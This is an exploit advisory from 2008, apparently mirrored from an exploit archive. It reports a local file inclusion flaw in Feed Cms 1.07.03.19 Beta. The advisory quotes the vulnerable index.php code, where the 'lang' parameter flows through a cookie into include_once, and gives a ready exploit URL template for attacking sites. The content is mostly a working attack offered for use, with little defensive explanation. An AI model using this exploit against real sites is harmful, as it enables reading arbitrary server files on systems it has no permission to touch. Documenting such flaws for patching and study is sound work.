[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Feed Cms 1.07.03.19b (lang) Local File Inclusion Vulnerability
# Published : 2008-12-11
# Author : x0r
# Previous Title : eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)
# Next Title : Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability
###############################
Feed Cms 1.07.03.19 Beta LFI
###############################
Autore: x0r
Email: andry2000@hotmail.it
Download:
http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
###############################
Bug In: index.php
if ($_GET['lang'])
{
$language = $_GET['lang'];
setcookie('firstlang',$language,time()+3600*240*365);
header('location:'.$redirect);
}
$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
include_once($FeedCms_Dir."lang/$lang/$lang.php");
LFI By Cookie ^ ^
Exploit:
http://[site]/FeedCms/?lang=[LFI] ^ ^
Greetz: A Te Che Mi Hai Cambiato La Vita...
# www.Syue.com [2008-12-11]